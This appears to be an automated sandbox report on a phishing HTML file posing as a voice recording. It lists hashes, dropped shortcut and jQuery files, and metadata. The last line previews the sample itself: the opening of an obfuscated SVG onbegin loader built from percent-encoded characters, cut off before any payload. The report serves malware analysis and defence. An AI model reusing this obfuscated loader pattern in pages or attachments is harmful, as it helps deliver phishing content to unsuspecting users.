                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:12
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • EGA enabled
                Analysis Mode:stream
                Analysis stop reason:Timeout
                Sample name:Tanveer Sethi_Voice-REC-481680954386772.html
                Detection:MAL
                Classification:mal72.phis.winHTML@13/8@9/92
                Cookbook Comments:
                • Found application associated with file extension: .html
                • Exclude process from analysis (whitelisted): svchost.exe
                • Excluded IPs from analysis (whitelisted): 2.16.185.191, 4.245.163.56, 13.107.253.72
                • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                • Not all processes where analyzed, report is missing behavior information
                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                • VT rate limit hit for: 5ruan6zklymxxoj1o8ciaecoiosprkgzbc.org
                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Feb 27 06:56:01 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                Category:dropped
                Size (bytes):2673
                Entropy (8bit):3.9851555729528525
                Encrypted:false
                SSDEEP:
                MD5:BE5D399EFFA22DB938D18E9C0A2F319C
                SHA1:AA36D022DD3FA5229AFB6D0571605BE0F3D88E9F
                SHA-256:6F0F34BA73534B7C8BA4536BEE7A8D882CEE11FAC2A1F90F06C660DB94F39DA6
                SHA-512:2782E2D8384AE1A205B4AED0BE62D2000BE543600019452C11A410D49EFC11DEDFF629776EBBB665A2FE33E6F63D5CF50B0C325D1ED810809D8469C6249EFD0C
                Malicious:false
                Reputation:unknown
                Preview:L..................F.@.. ...$+.,.....^.....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I[Z.>....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V[Z.?....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V[Z.?....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V[Z.?..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V[Z.?...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........PN.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Feb 27 06:56:01 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                Category:dropped
                Size (bytes):2675
                Entropy (8bit):3.9965445874006345
                Encrypted:false
                SSDEEP:
                MD5:CEF06484B7E6AC9646CD05F33FE98F49
                SHA1:3CF2AD7A7D0C810025607F646A084B28C46A582F
                SHA-256:965479095E251FD3207DE9EB1D881DB9E0FAB05BD72CAC5B698A63B182B62C0C
                SHA-512:D0E3467F71711878AA77F2E6EC72C59A6FDB8788BE039A45D66F72AD64CA9BEEC985D71EE745C2F5C5D4E86C36FA129C4B434549CD1EA675C4B29FA89A0A3D36
                Malicious:false
                Reputation:unknown
                Preview:L..................F.@.. ...$+.,....1.o....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I[Z.>....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V[Z.?....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V[Z.?....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V[Z.?..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V[Z.?...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........PN.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                Category:dropped
                Size (bytes):2689
                Entropy (8bit):4.006361392819798
                Encrypted:false
                SSDEEP:
                MD5:D0EF5598D88E0365F568936B9F4F071F
                SHA1:9A79B6DC2F6A8DEF9D90760A423FE2287A368E4A
                SHA-256:733B5166D41691A41C9211A9D69FC4DDDBF593D3C702AA79F919D0D3CE72CD61
                SHA-512:40EFCBB1A3CF3AFD06DE144485F761E3FEFA53AE925D6AC625BB7648EDAD4683DF1C5D0F1B6A17C44F2ABD1C09944BDCC311E14E309C9DA3AEC7E30A480C76FE
                Malicious:false
                Reputation:unknown
                Preview:L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I[Z.>....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V[Z.?....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V[Z.?....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V[Z.?..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........PN.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Feb 27 06:56:01 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                Category:dropped
                Size (bytes):2677
                Entropy (8bit):3.9954724520733933
                Encrypted:false
                SSDEEP:
                MD5:4830067675EFAF36893DF9101552B7DB
                SHA1:7818E7FD9386DF597D2867532A5A6679A67BC056
                SHA-256:9B255E8478B28658E793A224DE1C455B410B842662462D96059F92AB7D526E91
                SHA-512:F58DA69630C604B919D670F4FE9ED11BF7E0053BCA990E6CAC6D2FBF99EA23AD83620B488C977CDF96DD9EF17C961446BFBA72AD576610D9F6CC77C6D01F27A8
                Malicious:false
                Reputation:unknown
                Preview:L..................F.@.. ...$+.,....#-h....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I[Z.>....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V[Z.?....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V[Z.?....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V[Z.?..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V[Z.?...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........PN.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Feb 27 06:56:01 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                Category:dropped
                Size (bytes):2677
                Entropy (8bit):3.984416823497049
                Encrypted:false
                SSDEEP:
                MD5:0225951542CCFA5A69368D7001A69710
                SHA1:A532C3C42E363FFCEB1831018997AB8960DA9BDA
                SHA-256:D02AD759A74077C1DE6EE1494955E459F20D63583F8F782C0FBBDECA592D66B9
                SHA-512:330E82CBB0B7930E3E985DF31F8546280081DA81D8FEAB3A6A058FDEDC63767D796948929C2D4AA376C95DC9165986AA19D045C884DCC2FA1C79EE739204A90B
                Malicious:false
                Reputation:unknown
                Preview:L..................F.@.. ...$+.,....c.w....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I[Z.>....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V[Z.?....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V[Z.?....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V[Z.?..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V[Z.?...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........PN.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Feb 27 06:56:01 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                Category:dropped
                Size (bytes):2679
                Entropy (8bit):3.995073233864402
                Encrypted:false
                SSDEEP:
                MD5:E3100A0CBF8A36EB29EEBDE6598197E5
                SHA1:56F09925C79633F8DF6356E74155EA963053A1D8
                SHA-256:D13E2464F9AED52EB3BE841888348FCD01C1614841BA86A14647645BC27C4937
                SHA-512:D5D53B490DF01216EDFC26352FDD0406CB10C3E52289965134B98CD5C568E6E59C50AA3F9F328BD57606C85024C00CB771242EE87E503362754B3C86B44E3DE7
                Malicious:false
                Reputation:unknown
                Preview:L..................F.@.. ...$+.,....yNX....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I[Z.>....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V[Z.?....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V[Z.?....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V[Z.?..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V[Z.?...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........PN.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                File Type:ASCII text, with very long lines (65447)
                Category:dropped
                Size (bytes):89501
                Entropy (8bit):5.289893677458563
                Encrypted:false
                SSDEEP:
                MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                Malicious:false
                Reputation:unknown
                Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):21
                Entropy (8bit):3.4273334938982654
                Encrypted:false
                SSDEEP:
                MD5:B93F7F189C790DF6BA03B02CE34992C6
                SHA1:FAE19625E4770FC922B28949B80E5C245CAD3A78
                SHA-256:3561C489D0B2FF97C747C10BB39D826D4E69C62C7E13BF423492735221298843
                SHA-512:089711C4E21F2DF6BC5DC6E2BC13974A0F2D1AF608A2175C25C049A9E15AAA2BBDCD2DD6A8DBA8BBB375F7DAFFB0C9D9334486546B6419DCC5EE5FD4983261DD
                Malicious:false
                Reputation:unknown
                Preview:Site is coming soon!!
                File type:HTML document, ASCII text
                Entropy (8bit):3.5110463544830437
                TrID:
                  File name:Tanveer Sethi_Voice-REC-481680954386772.html
                  File size:6'356 bytes
                  MD5:d44cce885742160c3ce552280eed56d2
                  SHA1:66609d4d0e85566900a5265bf7c76bbc656c1ff1
                  SHA256:0f7f173e6f70c4958b783074205e8698290bfdd7f3c2811f3df208ed099b92ee
                  SHA512:10e34d5d9f6a992e063a3580a5ed5d8b9e7936fe0b110e5c183bba14d2098e157da0e6a06c9fa5027d62e6015c55c818c433d325fb1adb0003eeaa520444a960
                  SSDEEP:192:GB353q/3Vz3ozdfTfGlxX1Em84yT3RcLzQVTN3:Epa/FzSbGTudNX/
                  TLSH:DBD1FBD4A700D2B1953A58BE7C5F2948128E1309FBE231E107EB9B2407E21DEBBB4C5D
                  File Content Preview:. <!Doctype html><svg><animate attributeName="x" onbegin='let vtgykfpqdr = `%3c.%21.%44.%4f.%43.%54.%59.%50.%45.%20.%68.%74.%6d.%6c.%3e.%0A.%3c.%68.%74.%6d.%6c.%20.%6c.%61.%6e.%67.%3d.%22.%65.%6e.%22.%3e.%0A.%3c.%68.%65.%61.%64.%3e.%0A.%3c.%73.%63.